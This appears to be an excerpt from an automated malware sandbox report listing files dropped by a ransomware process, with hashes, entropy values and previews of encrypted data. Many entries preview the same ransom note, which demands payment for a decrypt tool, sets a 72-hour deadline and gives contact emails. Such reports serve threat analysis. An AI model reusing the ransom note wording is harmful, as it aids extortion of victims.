                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290
                                                                                                                                            Entropy (8bit):7.267124984781476
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:YvGx2uPXk/E/g3nP+YHRm9gNFAS8M++47mXKWJk8Ue3GKjS4tAY75Vwn:iGwmk/fXWYHQSN58/1UKOk+3GN4b9Vwn
                                                                                                                                            MD5:4F343C14CB2F9F1187E3F4AED9C39C69
                                                                                                                                            SHA1:EE96027E970C58CD04B1263A6DD2618E576C9075
                                                                                                                                            SHA-256:7AC0C059806588AFDC1DEA56EB034C053E4EC0945D6C69E25391E19FA3464760
                                                                                                                                            SHA-512:0596B2C94C6E2D3454E2945A276EAEE1BF43E3FA1F9420EF264A8BB70B7101BA76F78EF27B08CA0ACEF2BF3A7EAA650D43075CDB3692CC2AE7DCE54FE7DF1A97
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:M....``.y..w.V.}.......f..<.)+..,$.._E..........y...DLkj..i.2...=....B..>,.<cu.Eo=.M./.....t-.Yv."..B../$.aP..i.*i.._vRZ..C([.@.........x.`.7}.H...._...../..r.<W...\."L...[=..Zp2....s).&.c.|.p..G.Y...-....e.C..;.?m.n.../.#..P.[.v.9...X.-!\^$.B.T...{l..]....}.S[ob0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):734
                                                                                                                                            Entropy (8bit):7.729151932950673
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:gy45IdZF2VtRiT4UEo34u5tG+kNIBml0o2s6wfzaoi77wEYSHLOCv7PpJoK5YAia:vGId8+4lol5t+Iw046wu7wStgQ
                                                                                                                                            MD5:B17B748949544843E1CE08B596361717
                                                                                                                                            SHA1:3D8D62ACCD7B75A1F0C395E248B8F4CB1B5A7B3B
                                                                                                                                            SHA-256:36BB46171A76B58EE83F76F7703A017696F725A9C6493240AE1460EAEAD6EEB6
                                                                                                                                            SHA-512:F0781D4D5BE052BDB421D48E39F0DDF7C43381B33C465437A78F5963202BE577798B6F7EE53E41A7BE00E20F2DB589712D493404851387021806661D3DAFBD39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.E....;s...KY..)..7..,.p....G0....9/.6.6..m...5.R.......p..M....:..G...V.. fm......2..}}....@..h5..pl.L..~........@........;.:5.y....1r...q?..r....&...)`..6.Q..-.n.4..T.$.5.E.gVN...j?da.g ..6.t../j;X..c...'j...NJO......e(pJ..]}Q...y./2.....2d......`.QqZ..V..D.......1..4..%..0U.....9./(..4B.iP&V.=.a.a)........s...d...t....0..;o.y.B..b..Y.4........o...g....Y..M.n(_.@.1xS.\.w..e7z.....[.3{..(.qO...0^j..0W..s%.)...Wp#....<..\.b.#!'T6|.<& J9...}...s.D;1..s]1y..9..aeY.O...L.|L..(..._.yG......G...@.d}e....g.ljj<sU7....p.M.[.?).].....?.....m...k.!..9.\2G.<...7i....h1U@.=....IU......:.}..#.3....g...+..h....|F.,[.w.........e.....}x<...3i..6.........!R.....4.SA.sI.....=./.U...4.))..x....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):734
                                                                                                                                            Entropy (8bit):7.729151932950673
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:gy45IdZF2VtRiT4UEo34u5tG+kNIBml0o2s6wfzaoi77wEYSHLOCv7PpJoK5YAia:vGId8+4lol5t+Iw046wu7wStgQ
                                                                                                                                            MD5:B17B748949544843E1CE08B596361717
                                                                                                                                            SHA1:3D8D62ACCD7B75A1F0C395E248B8F4CB1B5A7B3B
                                                                                                                                            SHA-256:36BB46171A76B58EE83F76F7703A017696F725A9C6493240AE1460EAEAD6EEB6
                                                                                                                                            SHA-512:F0781D4D5BE052BDB421D48E39F0DDF7C43381B33C465437A78F5963202BE577798B6F7EE53E41A7BE00E20F2DB589712D493404851387021806661D3DAFBD39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.E....;s...KY..)..7..,.p....G0....9/.6.6..m...5.R.......p..M....:..G...V.. fm......2..}}....@..h5..pl.L..~........@........;.:5.y....1r...q?..r....&...)`..6.Q..-.n.4..T.$.5.E.gVN...j?da.g ..6.t../j;X..c...'j...NJO......e(pJ..]}Q...y./2.....2d......`.QqZ..V..D.......1..4..%..0U.....9./(..4B.iP&V.=.a.a)........s...d...t....0..;o.y.B..b..Y.4........o...g....Y..M.n(_.@.1xS.\.w..e7z.....[.3{..(.qO...0^j..0W..s%.)...Wp#....<..\.b.#!'T6|.<& J9...}...s.D;1..s]1y..9..aeY.O...L.|L..(..._.yG......G...@.d}e....g.ljj<sU7....p.M.[.?).].....?.....m...k.!..9.\2G.<...7i....h1U@.=....IU......:.}..#.3....g...+..h....|F.,[.w.........e.....}x<...3i..6.........!R.....4.SA.sI.....=./.U...4.))..x....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290
                                                                                                                                            Entropy (8bit):7.237024791839402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:uJ/gJKgzQBb/lf1QdxQ1gkvL8oezBQUb78bagmFkRQr/6MOQIzLbmnn:uV2+f1IWnLGmo78bajqXM0Lb+n
                                                                                                                                            MD5:EEC533338CD87E86C7035041D472FC37
                                                                                                                                            SHA1:BFFD5ED5BC68F446D4ACF9EB52EED9A49591A760
                                                                                                                                            SHA-256:3E57E52ED1E439814F19F613BFBA77B4720A2AB2D6961F37E4DADF81532F107C
                                                                                                                                            SHA-512:9914EC6901E1DF5741C26412B182E70ADCC06FDCF86B0A82A0B723E567D9DD01534FADE5B3B499976DE5C8D7950BB0A525329D1FA395285F8FD5C96A8DC2CDBD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:4?Z..*..Ol...V.g.v.-#>..T0E5...Ma..!...,..Ul.6B...2..~.U.....l&.r.(CC..|gz[..+9U........P.q..^Y.,..T6.WV..?..yP.6^\..?.c.K..l...u..dA....V...q...... \.|Va..'..:....-.5.Y.H.h.Gg.dE.u8.....w..........7.G/.........f.y....:I'Q...o#......2.;d.....}K.:~..J.m...}R........1.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290
                                                                                                                                            Entropy (8bit):7.237024791839402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:uJ/gJKgzQBb/lf1QdxQ1gkvL8oezBQUb78bagmFkRQr/6MOQIzLbmnn:uV2+f1IWnLGmo78bajqXM0Lb+n
                                                                                                                                            MD5:EEC533338CD87E86C7035041D472FC37
                                                                                                                                            SHA1:BFFD5ED5BC68F446D4ACF9EB52EED9A49591A760
                                                                                                                                            SHA-256:3E57E52ED1E439814F19F613BFBA77B4720A2AB2D6961F37E4DADF81532F107C
                                                                                                                                            SHA-512:9914EC6901E1DF5741C26412B182E70ADCC06FDCF86B0A82A0B723E567D9DD01534FADE5B3B499976DE5C8D7950BB0A525329D1FA395285F8FD5C96A8DC2CDBD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:4?Z..*..Ol...V.g.v.-#>..T0E5...Ma..!...,..Ul.6B...2..~.U.....l&.r.(CC..|gz[..+9U........P.q..^Y.,..T6.WV..?..yP.6^\..?.c.K..l...u..dA....V...q...... \.|Va..'..:....-.5.Y.H.h.Gg.dE.u8.....w..........7.G/.........f.y....:I'Q...o#......2.;d.....}K.:~..J.m...}R........1.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.268433850163104
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:9pl0SlOtyewrQl3UfdHyAEBQ/t+42K75GpObQodRP6sl2WlumZmhlweC43Rroobn:9LmwrQl3UfdyYt+7KQp0Jd56oxcl9x3D
                                                                                                                                            MD5:1B08A50DC6D784D346343D9245500688
                                                                                                                                            SHA1:6CA0F27F5766A3EF64504E92D1C32D635A9A9E29
                                                                                                                                            SHA-256:750C96A41485422EB1492DC39737A9632C491D3C114C06BF0338957339BC01DE
                                                                                                                                            SHA-512:9A618952AC412EF01463F83AD64F04583DFB1CFFA43F46DE38A5854818FB6D7970C548FA683C1FCEAFBA53D17CD8A94AF81A58649A076E8BFD70F568D1E11066
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..f.Nd...I.............-j..kTO...KG.#u.Ag..}....H.Nr%...4......DYTR....j...T>P..bN...k..,? .,.-.U3.....]...Z!....pe......m..+...!.ZS..*Qd......[9y.\[..c.=Mte..p..A...;H./..e...@.DVa^...!8@....#T.l..y58#L[..2...s@..JK.d..2..W.m....<kM$....T..3...!t.;=.nM....t........~..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
